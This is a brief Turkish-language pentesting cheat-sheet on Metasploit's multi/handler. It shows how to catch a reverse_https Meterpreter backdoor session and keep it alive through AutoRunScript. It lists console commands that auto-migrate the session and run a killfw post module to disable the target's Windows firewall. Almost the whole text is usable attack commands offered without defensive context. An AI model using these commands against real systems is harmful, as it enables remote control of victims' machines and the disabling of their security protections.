Metasoloit & Meterpreter & msfvenom

Create Backdoor All Format;

Eğer bir meterpreter oturumu alındıktan çok kısa bir süre sonra sonlanıdırılıyor ise (örneğin 5 saniye); bu durumda multi handler modülünde bulunan AutoRunScript parametresi kullanılarak, oturum elde edilir edilmez doğrudan auto bir şekilde migration işlemini gerçekleştiririr.

msf > use exploit/multi/handler
msf (handler) > set AutoRunScript multi_console_command -rc /root/mycommands.rb


<!-- The contents of /root/mycommands.rb include: -->
root@kali# cat /root/mycommands.rb
run post/windows/manage/smart_migrate
run post/windows/manage/killfw

Daha makul bir kullanım aşağıdaki şekildedir.

Copy

msf>use exploit/multi/handler
msf>set payload windows/meterpreter/reverse_https
msf>set AutoRunScript post/windows/manage/migrate
msf>set lhost <local IP>
msf> set lport <local port>
msf>exploit